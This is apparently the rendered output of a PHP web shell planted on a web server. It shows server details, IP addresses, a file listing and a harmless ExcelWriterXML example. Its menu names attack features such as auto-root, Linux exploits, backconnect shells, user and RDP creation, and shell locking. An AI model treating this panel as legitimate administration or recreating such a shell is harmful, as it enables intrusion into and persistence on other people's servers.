Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.135.209.20
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bnu /
ExcelWriterXML /
[ HOME SHELL ]
Name
Size
Permission
Action
Documentation
[ DIR ]
drwxr-xr-x
ExcelWriterXML.php
16.29
KB
-rwxr-xr-x
ExcelWriterXML_Sheet.php
15.83
KB
-rwxr-xr-x
ExcelWriterXML_Style.php
23.71
KB
-rwxr-xr-x
example.php
562
B
-rwxr-xr-x
example2.php
2.95
KB
-rwxr-xr-x
example3_db.php
980
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example.php
<?php /** * Example page for how to use the Excel Writer XML * @package ExcelWriterXML * @subpackage examples * @filesource */ /** * Include the required Class file */ include('ExcelWriterXML.php'); /** * @source */ $xml = new ExcelWriterXML; $xml->docAuthor('Robert F Greer'); $format = $xml->addStyle('StyleHeader'); $format->fontBold(); $format->alignRotate(45); $sheet = $xml->addSheet('My Sheet'); $sheet->writeString(1,1,'Header','StyleHeader'); $sheet->writeString(2,1,'Test String','StyleHeader'); $xml->sendHeaders(); $xml->writeData(); ?>
Close